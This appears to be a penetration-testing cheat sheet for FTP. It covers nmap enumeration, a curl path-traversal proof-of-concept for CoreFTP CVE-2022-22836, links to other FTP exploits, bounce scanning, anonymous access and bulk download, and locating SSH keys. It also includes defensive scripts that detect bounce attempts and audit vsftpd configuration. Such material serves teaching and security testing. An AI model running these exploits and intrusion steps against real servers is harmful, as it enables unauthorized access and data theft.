# FTP (21)

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Nmap

```shell-session
sudo nmap -sV -p21 -sC -A 10.129.14.136
```

## All scripts

```shell-session
$ find / -type f -name 'ftp*' 2>/dev/null | grep scripts

/usr/share/nmap/scripts/ftp-syst.nse
/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse
/usr/share/nmap/scripts/ftp-proftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-bounce.nse
/usr/share/nmap/scripts/ftp-libopie.nse
/usr/share/nmap/scripts/ftp-anon.nse
/usr/share/nmap/scripts/ftp-brute.nse
```

## Exploit

### CoreFTP before build 727 - CVE-2022-22836

Authenticated directory/path traversal and arbitrary file write vulnerability.

```shell-session
curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
```

### CrushFTP - CVE-2024-4040

{% embed url="https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC" %}

### Wing FTP RCE - CVE-2025-47812

{% content-ref url="../public-exploit/wing-ftp" %}
[wing-ftp](https://0xss0rz.gitbook.io/0xss0rz/pentest/public-exploit/wing-ftp)
{% endcontent-ref %}

### CVE-2024-46483 - Pre-Authentication Heap Overflow in Xlight SFTP server

Affects Xlight 32- and 64-bit versions <= 3.9.4.2.

{% embed url="https://github.com/kn32/cve-2024-46483" %}

## FTP Bounce attack

Suppose we are targeting an FTP server `FTP_DMZ` that is exposed to the internet. Another device on the same network, `Internal_DMZ`, is not exposed to the internet. We can use our connection to `FTP_DMZ` to scan `Internal_DMZ` with the FTP bounce attack and learn which of its ports are open, then use that information as part of the attack against the infrastructure. The attack relies on the server honouring a `PORT` command that names a host other than the connecting client; vsftpd refuses such commands by default (`port_promiscuous=NO`).

The `-b` flag of `nmap` performs a bounce scan through the given FTP server:

```shell-session
$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:password@10.10.110.213:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.

PORT   STATE  SERVICE
80/tcp open http

<SNIP>
```

## Connect to FTPS (FTP over TLS)

```shell-session
$ openssl s_client -connect 10.129.14.136:21 -starttls ftp
```

```shell-session
lftp
lftp :~> set ftp:ssl-force true
lftp :~> set ssl:verify-certificate no
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> login
Usage: login <user|URL> [<pass>]
lftp 10.10.10.208:~> login username Password
```

## Theory

FTP uses two TCP connections: a control channel on port 21 for commands and replies, and a separate data channel for listings and transfers. A distinction is made between `active` and `passive` FTP. In active mode, the client opens the control connection to port 21 and then tells the server, with the `PORT` command, which client-side address and port the server should connect back to for the data channel. If a firewall (or NAT) protects the client, that inbound connection from the server is blocked. `Passive mode` was developed for this case: the client sends `PASV` (or `EPSV`), the server announces a port on which it is listening, and the client initiates the data connection itself, so the client-side firewall does not block the transfer.
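To make the `PORT`/`PASV`/`EPSV` mechanics above concrete, here is an added example (written for this page, not code from the original cheat sheet or from any FTP server) that decodes the `h1,h2,h3,h4,p1,p2` tuples FTP uses for data-channel endpoints, the `229` extended-passive reply that appears later on this page, and applies the server-side check that defeats the FTP bounce attack from the previous section: a `PORT` command must point back at the client that sent it and at an unprivileged port (modelled on what vsftpd enforces with its default `port_promiscuous=NO`). All log lines below are constructed.

```python
"""Decode FTP data-channel endpoints (PORT, PASV, EPSV) and flag bounce attempts.

Added example for this page; not part of the original cheat sheet or of any
FTP server. Every input string below is constructed for illustration.
"""
from __future__ import annotations

import re
from ipaddress import ip_address

# Client -> server, active mode:  PORT h1,h2,h3,h4,p1,p2
PORT_RE = re.compile(r"^PORT\s+(\d{1,3}(?:,\d{1,3}){5})\s*$", re.IGNORECASE)
# Server -> client, passive mode: 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)
PASV_RE = re.compile(r"^227 .*?\((\d{1,3}(?:,\d{1,3}){5})\)")
# Server -> client, extended passive (RFC 2428): 229 ... (|||port|)
EPSV_RE = re.compile(r"^229 .*?\(\|\|\|(\d{1,5})\|\)")


def _decode_hostport(six: str) -> tuple[str, int]:
    """'h1,h2,h3,h4,p1,p2' -> ('h1.h2.h3.h4', p1*256 + p2)."""
    parts = [int(x) for x in six.split(",")]
    if len(parts) != 6 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError(f"malformed h1-h4,p1,p2 tuple: {six!r}")
    host = ".".join(str(p) for p in parts[:4])
    port = parts[4] * 256 + parts[5]
    if port == 0:
        raise ValueError("port 0 is not a valid data port")
    return host, port


def parse_port_command(line: str) -> tuple[str, int]:
    """Active mode: the client names the endpoint the server must connect back to."""
    m = PORT_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a PORT command: {line!r}")
    return _decode_hostport(m.group(1))


def parse_pasv_reply(line: str) -> tuple[str, int]:
    """Passive mode: the server names the endpoint the client should connect to."""
    m = PASV_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a 227 PASV reply: {line!r}")
    return _decode_hostport(m.group(1))


def parse_epsv_reply(line: str) -> int:
    """Extended passive mode: only the port is announced; the host is the control peer."""
    m = EPSV_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a 229 EPSV reply: {line!r}")
    port = int(m.group(1))
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port


def is_bounce_attempt(control_peer_ip: str, port_line: str) -> bool:
    """True when a PORT command names a host other than the sending client,
    or a privileged port. A legitimate client only ever asks the server to
    connect back to itself; anything else is the bounce pattern, which a
    server should answer with '500 Illegal PORT command'."""
    host, port = parse_port_command(port_line)
    return ip_address(host) != ip_address(control_peer_ip) or port < 1024


# Constructed control-channel samples: the first PORT is the client's own address,
# the second asks the server to open a data connection to a different internal host.
CLIENT_IP = "10.10.14.4"
SAMPLE_LINES = [
    "PORT 10,10,14,4,222,149",
    "PORT 172,17,0,2,0,80",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        host, port = parse_port_command(line)
        verdict = "BOUNCE (reject)" if is_bounce_attempt(CLIENT_IP, line) else "ok"
        print(f"{line:26} -> {host}:{port:<5} {verdict}")
    print(parse_pasv_reply("227 Entering Passive Mode (10,129,14,136,172,16)"))
    print(parse_epsv_reply("229 Entering Extended Passive Mode (|||44048|)"))
```

The same decoding applies when reviewing FTP server logs or a packet capture: every `PORT` whose decoded address differs from the TCP peer that sent it is either a misconfigured NAT client or a bounce attempt, and both deserve a look.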

## Commands

Command reference:

{% embed url="https://www.computerhope.com/issues/ch001246.htm" %}

| **Command**    | **Description** |
| -------------- | --------------- |
| **bye**        | [Exits](https://www.computerhope.com/jargon/e/exit.htm) from FTP. |
| **cd**         | Changes [directory](https://www.computerhope.com/jargon/d/director.htm). |
| **close**      | Exits from FTP. |
| **delete**     | [Deletes](https://www.computerhope.com/jargon/d/delete.htm) a file. |
| **dir**        | <p>Lists files if connected.<br><br><strong>dir -C</strong> lists the files in wide format.<br><strong>dir -1</strong> lists the files in bare format in <a href="https://www.computerhope.com/jargon/a/alphabetic.htm">alphabetic</a> order.<br><strong>dir -r</strong> lists the directory in reverse alphabetic order.<br><strong>dir -R</strong> lists all files in the current directory and its subdirectories.<br><strong>dir -S</strong> lists files in bare format in alphabetic order.</p> |
| **disconnect** | Exits from FTP. |
| **get**        | Downloads a file from the connected computer. |
| **put**        | Sends one file to the connected computer. |
| **pwd**        | Prints the [working directory](https://www.computerhope.com/jargon/c/currentd.htm). |

## Configuration

```shell-session
cat /etc/vsftpd.conf | grep -v "#"
```

| **Setting**                                                   | **Description**                                                                                          |
| ------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------- |
| `listen=NO`                                                   | Run from inetd (NO) or as a standalone IPv4 daemon (YES)?                                                |
| `listen_ipv6=YES`                                             | Listen on IPv6 as a standalone daemon? (On Linux this socket also accepts IPv4 clients.)                 |
| `anonymous_enable=NO`                                         | Allow anonymous login?                                                                                   |
| `local_enable=YES`                                            | Allow local (system account) users to log in?                                                            |
| `dirmessage_enable=YES`                                       | Show the directory message (`.message` file) when users enter certain directories?                       |
| `use_localtime=YES`                                           | Report file timestamps in local time rather than GMT?                                                    |
| `xferlog_enable=YES`                                          | Log uploads and downloads?                                                                               |
| `connect_from_port_20=YES`                                    | Originate active-mode data connections from port 20?                                                     |
| `secure_chroot_dir=/var/run/vsftpd/empty`                     | Empty, non-writable directory used as a chroot jail whenever vsftpd needs no filesystem access.          |
| `pam_service_name=vsftpd`                                     | Name of the PAM service vsftpd authenticates against.                                                    |
| `rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem`          | RSA certificate used for TLS (FTPS) connections; the `snakeoil` file is a self-signed placeholder.       |
| `rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key` | Matching private key.                                                                                    |
| `ssl_enable=NO`                                               | Enable TLS? With NO, the certificate above is unused and credentials and data cross the wire in clear text. |

`/etc/ftpusers`: users listed in this file (one per line) are denied access to the FTP service.

```shell-session
cat /etc/ftpusers

guest
john
kevin
```

## Anonymous

| **Setting**                    | **Description**                                                                    |
| ------------------------------ | ---------------------------------------------------------------------------------- |
| `anonymous_enable=YES`         | Allow anonymous login?                                                             |
| `anon_upload_enable=YES`       | Allow anonymous users to upload files? (Also requires `write_enable=YES`.)         |
| `anon_mkdir_write_enable=YES`  | Allow anonymous users to create new directories? (Also requires `write_enable=YES`.) |
| `no_anon_password=YES`         | Skip the password prompt for anonymous users?                                      |
| `anon_root=/home/username/ftp` | Directory anonymous users are placed in after login.                               |
| `write_enable=YES`             | Allow the write commands STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE?         |
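The two tables above (Configuration and Anonymous) describe settings one at a time; what matters in practice is their combination. The following added example (written for this page, not part of the original cheat sheet or of vsftpd) parses a `vsftpd.conf` the way `grep -v "#"` does, fills in the compiled-in defaults from `vsftpd.conf(5)` for keys the file omits, reads `/etc/ftpusers`, and reports the weak combinations from the tables. The two configurations and the `ftpusers` contents are constructed samples; the certificate paths in the hardened one are placeholders.

```python
"""Audit a vsftpd.conf against the settings listed in the tables above.

Added example for this page; not vsftpd code and not part of the original
cheat sheet. The configurations and /etc/ftpusers contents are constructed.
"""
from __future__ import annotations

# Compiled-in defaults from vsftpd.conf(5), used when a key is absent from the file.
# Note that anonymous access is ON unless the file explicitly turns it off.
DEFAULTS = {
    "anonymous_enable": "YES",
    "local_enable": "NO",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "no_anon_password": "NO",
    "ssl_enable": "NO",
    "xferlog_enable": "NO",
}


def parse_vsftpd_conf(text: str) -> dict[str, str]:
    """key=value lines on top of DEFAULTS; comment and blank lines are skipped."""
    settings = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def parse_ftpusers(text: str) -> set[str]:
    """One denied username per line; lines starting with '#' are comments."""
    return {ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")}


def audit(settings: dict[str, str], denied: set[str]) -> list[str]:
    """Return findings as strings; an empty list means nothing was flagged."""
    def on(key: str) -> bool:
        return settings.get(key, "NO").upper() == "YES"

    findings: list[str] = []
    if on("anonymous_enable"):
        findings.append("anonymous login enabled (anonymous_enable=YES)")
        if on("write_enable") and on("anon_upload_enable"):
            findings.append("anonymous upload allowed (write_enable=YES + anon_upload_enable=YES)")
        if on("write_enable") and on("anon_mkdir_write_enable"):
            findings.append("anonymous mkdir allowed (write_enable=YES + anon_mkdir_write_enable=YES)")
        if on("no_anon_password"):
            findings.append("anonymous users are not even prompted for a password (no_anon_password=YES)")
    if not on("ssl_enable"):
        findings.append("TLS off: credentials and files cross the network in clear text (ssl_enable=NO)")
    elif "snakeoil" in settings.get("rsa_cert_file", ""):
        findings.append("TLS uses the self-signed placeholder certificate (ssl-cert-snakeoil.pem)")
    if not on("xferlog_enable"):
        findings.append("no transfer log (xferlog_enable=NO): uploads/downloads leave no trail")
    if on("local_enable") and "root" not in denied:
        findings.append("local logins on but 'root' is missing from /etc/ftpusers")
    return findings


# Constructed samples. WEAK_CONF mirrors the Anonymous table on this page.
WEAK_CONF = """\
listen=NO
listen_ipv6=YES
anonymous_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
no_anon_password=YES
anon_root=/home/username/ftp
write_enable=YES
local_enable=YES
xferlog_enable=YES
ssl_enable=NO
"""

# Hardened counterpart; the certificate paths are placeholders, not real files.
HARDENED_CONF = """\
# comment lines and blank lines are ignored by the parser

listen=NO
listen_ipv6=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
xferlog_enable=YES
ssl_enable=YES
rsa_cert_file=/etc/ssl/certs/ftp.example.org.pem
rsa_private_key_file=/etc/ssl/private/ftp.example.org.key
"""

FTPUSERS_WEAK = "guest\njohn\nkevin\n"            # as on this page: root is absent
FTPUSERS_HARDENED = "root\nguest\njohn\nkevin\n"

if __name__ == "__main__":
    for name, conf, users in (("weak", WEAK_CONF, FTPUSERS_WEAK),
                              ("hardened", HARDENED_CONF, FTPUSERS_HARDENED)):
        findings = audit(parse_vsftpd_conf(conf), parse_ftpusers(users))
        print(f"[{name}] {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```

Run it against a real host with `audit(parse_vsftpd_conf(open("/etc/vsftpd.conf").read()), parse_ftpusers(open("/etc/ftpusers").read()))`; because defaults are filled in first, a file that never mentions `anonymous_enable` is correctly reported as allowing anonymous logins.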

```shell-session
$ ftp 10.129.14.136

Connected to 10.129.14.136.
220 "Welcome to the HTB Academy vsFTP service."
Name (10.129.14.136:cry0l1t3): anonymous

230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1002     1002      8138592 Sep 14 16:54 Calender.pptx
drwxrwxr-x    2 1002     1002         4096 Sep 14 16:50 Clients
drwxrwxr-x    2 1002     1002         4096 Sep 14 16:50 Documents
drwxrwxr-x    2 1002     1002         4096 Sep 14 16:50 Employees
-rw-rw-r--    1 1002     1002           41 Sep 14 16:45 Important Notes.txt
226 Directory send OK.
```

## List hidden files

```shell-session
ftp> ls -la
229 Entering Extended Passive Mode (|||44048|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 ..
-rw-------   1 ceil     ceil          294 Nov 10  2021 .bash_history
-rw-r--r--   1 ceil     ceil          220 Nov 10  2021 .bash_logout
-rw-r--r--   1 ceil     ceil         3771 Nov 10  2021 .bashrc
drwx------   2 ceil     ceil         4096 Nov 10  2021 .cache
-rw-r--r--   1 ceil     ceil          807 Nov 10  2021 .profile
drwx------   2 ceil     ceil         4096 Nov 10  2021 .ssh
-rw-------   1 ceil     ceil          759 Nov 10  2021 .viminfo
226 Transfer complete
ftp> cd .ssh
250 CWD command successful
ftp> ls -la
229 Entering Extended Passive Mode (|||46129|)
150 Opening ASCII mode data connection for file list
drwx------   2 ceil     ceil         4096 Nov 10  2021 .
drwxr-xr-x   4 ceil     ceil         4096 Nov 10  2021 ..
-rw-rw-r--   1 ceil     ceil          738 Nov 10  2021 authorized_keys
-rw-------   1 ceil     ceil         3381 Nov 10  2021 id_rsa
-rw-r--r--   1 ceil     ceil          738 Nov 10  2021 id_rsa.pub
226 Transfer complete
ftp>
```

## Recursive Listing

```shell-session
ftp> ls -R

---> PORT 10,10,14,4,222,149
200 PORT command successful. Consider using PASV.
---> LIST -R
150 Here comes the directory listing.
.:
-rw-rw-r--    1 ftp      ftp      8138592 Sep 14 16:54 Calender.pptx
drwxrwxr-x    2 ftp      ftp         4096 Sep 14 17:03 Clients
drwxrwxr-x    2 ftp      ftp         4096 Sep 14 16:50 Documents
drwxrwxr-x    2 ftp      ftp         4096 Sep 14 16:50 Employees
-rw-rw-r--    1 ftp      ftp           41 Sep 14 16:45 Important Notes.txt
-rw-------    1 ftp      ftp            0 Sep 15 14:57 testupload.txt

./Clients:
drwx------    2 ftp      ftp          4096 Sep 16 18:04 HackTheBox
drwxrwxrwx    2 ftp      ftp          4096 Sep 16 18:00 Inlanefreight

./Clients/HackTheBox:
-rw-r--r--    1 ftp      ftp         34872 Sep 16 18:04 appointments.xlsx
-rw-r--r--    1 ftp      ftp        498123 Sep 16 18:04 contract.docx
-rw-r--r--    1 ftp      ftp        478237 Sep 16 18:04 contract.pdf
-rw-r--r--    1 ftp      ftp           348 Sep 16 18:04 meetings.txt

./Clients/Inlanefreight:
-rw-r--r--    1 ftp      ftp         14211 Sep 16 18:00 appointments.xlsx
-rw-r--r--    1 ftp      ftp         37882 Sep 16 17:58 contract.docx
-rw-r--r--    1 ftp      ftp            89 Sep 16 17:58 meetings.txt
-rw-r--r--    1 ftp      ftp        483293 Sep 16 17:59 proposal.pptx

./Documents:
-rw-r--r--    1 ftp      ftp         23211 Sep 16 18:05 appointments-template.xlsx
-rw-r--r--    1 ftp      ftp         32521 Sep 16 18:05 contract-template.docx
-rw-r--r--    1 ftp      ftp        453312 Sep 16 18:05 contract-template.pdf

./Employees:
226 Directory send OK.
```

## Download a File

```shell-session
ftp> ls

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 ftp      ftp             0 Sep 16 17:24 Calendar.pptx
drwxrwxrwx    4 ftp      ftp          4096 Sep 16 17:57 Clients
drwxrwxrwx    2 ftp      ftp          4096 Sep 16 18:05 Documents
drwxrwxrwx    2 ftp      ftp          4096 Sep 16 17:24 Employees
-rwxrwxrwx    1 ftp      ftp            41 Sep 18 15:58 Important Notes.txt
226 Directory send OK.


ftp> get Important\ Notes.txt

local: Important Notes.txt remote: Important Notes.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Important Notes.txt (41 bytes).
226 Transfer complete.
41 bytes received in 0.00 secs (606.6525 kB/s)


ftp> exit

221 Goodbye.
```

### Netexec

```shell-session
nxc ftp 192.168.0.10 -u 'marshall' -p 'badpassword' --ls
netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --ls [DIRECTORY]
netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --get [FILE]
```

## Download All Available Files

```shell-session
0xss0rz@htb[/htb]$ wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136

--2021-09-19 14:45:58--  ftp://anonymous:*password*@10.129.14.136/
           => ‘10.129.14.136/.listing’
Connecting to 10.129.14.136:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD not needed.
==> PORT ... done.    ==> LIST ... done.
12.12.1.136/.listing           [ <=>                                  ]     466  --.-KB/s    in 0s

2021-09-19 14:45:58 (65,8 MB/s) - ‘10.129.14.136/.listing’ saved [466]
--2021-09-19 14:45:58--  ftp://anonymous:*password*@10.129.14.136/Calendar.pptx
           => ‘10.129.14.136/Calendar.pptx’
==> CWD not required.
==> SIZE Calendar.pptx ... done.
==> PORT ... done.    ==> RETR Calendar.pptx ... done.

...SNIP...

2021-09-19 14:45:58 (48,3 MB/s) - ‘10.129.14.136/Employees/.listing’ saved [119]

FINISHED --2021-09-19 14:45:58--
Total wall clock time: 0,03s
Downloaded: 15 files, 1,7K in 0,001s (3,02 MB/s)
```

## Upload a File

```shell-session
ftp> put testupload.txt 

local: testupload.txt remote: testupload.txt
---> PORT 10,10,14,4,184,33
200 PORT command successful. Consider using PASV.
---> STOR testupload.txt
150 Ok to send data.
226 Transfer complete.
```

### Netexec

```shell-session
netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --put [LOCAL_FILE] [REMOTE_FILE]
```


## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**Nmap Network Scanning**](https://www.amazon.fr/dp/0979958717?tag=0xss0rz-21)\
  The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals.
* [**The Art of Network Penetration Testing**](https://www.amazon.fr/dp/1617296821)\
  A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.
* [**Network Basics for Hackers**](https://www.amazon.fr/dp/B0BS3GZ1R9)\
  The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
